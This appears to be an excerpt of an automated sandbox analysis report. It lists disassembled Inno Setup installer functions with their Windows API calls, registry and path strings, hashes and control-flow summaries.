                                                                                                                            • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                            • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                                            • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                            • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                            • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                                            • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                            • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                              • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                            • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$Close
                                                                                                                            • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                                            • API String ID: 3391052094-3342197833
                                                                                                                            • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                            • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                                            • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                            • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendering omitted: function entry block 492848-49287c; API calls in graph blocks: Sleep, FindWindowA, SendMessageA, PostMessageA, SendNotifyMessageA, RegisterClipboardFormatA, GetProcAddress, GetLastError, FreeLibrary, CreateMutexA, OemToCharBuffA, CharToOemBuffA; common exit block 492d22-492d3c]
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindSleepWindow
                                                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                            • API String ID: 3078808852-3310373309
                                                                                                                            • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                            • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                                            • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                            • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendering omitted: function entry block 483a7c-483aa1 (GetModuleHandleA, GetProcAddress); branches to 483aa3-483ab9 (GetNativeSystemInfo, GetProcAddress) with GetCurrentProcess at 483abb-483ac6, or to 483b08-483b0d (GetSystemInfo); further GetProcAddress/GetModuleHandleA resolution in 483ad7-483afd; common exit block 483b4d-483b52]
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                            • API String ID: 2230631259-2623177817
                                                                                                                            • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                            • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                                            • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                            • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendering omitted: function entry block 468d88-468dc0; RegCloseKey is called in block 468f7a-468f90; common exit block 468fa2-468fbc]
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                                            Strings
                                                                                                                            • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                                            • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                                            • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                                            • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                                            • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                                            • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                                            • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                                            • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                                            • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                                            • %s\%s_is1, xrefs: 00468E05
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                            • API String ID: 47109696-1093091907
                                                                                                                            • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                            • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                                            • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                            • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                              • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                              • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                            • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                                            • 76CF83B0.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                                              • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$AddressEnvironmentFolderHandleKnownModulePathProcSystemVariableWindows
                                                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                            • API String ID: 356131955-544719455
                                                                                                                            • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                            • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                                            • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                            • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph omitted; legend: Executed / Not Executed)
APIs
  • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
• GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
• RegisterClassA.USER32(00499630), ref: 004238B7
• GetSystemMetrics.USER32(00000000), ref: 004238D9
• GetSystemMetrics.USER32(00000001), ref: 004238E8
• SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
• SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
• GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
• DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
• String ID: |6B
• API String ID: 183575631-3009739247
• Opcode ID: 5571f2138a9ea83ce0d9c1dcd1b3cc51cb16f92404a0700befc21e2951ab6ca0
• Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
• Opcode Fuzzy Hash: 5571f2138a9ea83ce0d9c1dcd1b3cc51cb16f92404a0700befc21e2951ab6ca0
• Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph omitted; legend: Executed / Not Executed)
APIs
• GetProcAddress.KERNEL32(74AE0000,SHGetFolderPathA), ref: 0047CF7A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
• API String ID: 190572456-256906917
• Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
• Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
• Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
• Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph omitted; legend: Executed / Not Executed)
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
• Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
• Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
• Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
• Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
• GetWindowLongA.USER32(?,000000F0), ref: 0041366F
• GetWindowLongA.USER32(?,000000F4), ref: 00413681
• SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
• SetPropA.USER32(?,00000000,00000000), ref: 004136AB
• SetPropA.USER32(?,00000000,00000000), ref: 004136C2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID: 3A$yA
• API String ID: 3887896539-3278460822
• Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
• Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
• Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
• Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                                                            APIs
                                                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                              • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                                              • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                            • String ID: c:\directory$shell32.dll$%H
                                                                                                                            • API String ID: 3376378930-166502273
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetActiveWindow.USER32 ref: 0042F58F
• GetFocus.USER32 ref: 0042F597
• RegisterClassA.USER32(004997AC), ref: 0042F5B8
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
• ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
• SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358
Uniqueness
• Uniqueness Score: -1.00%

APIs
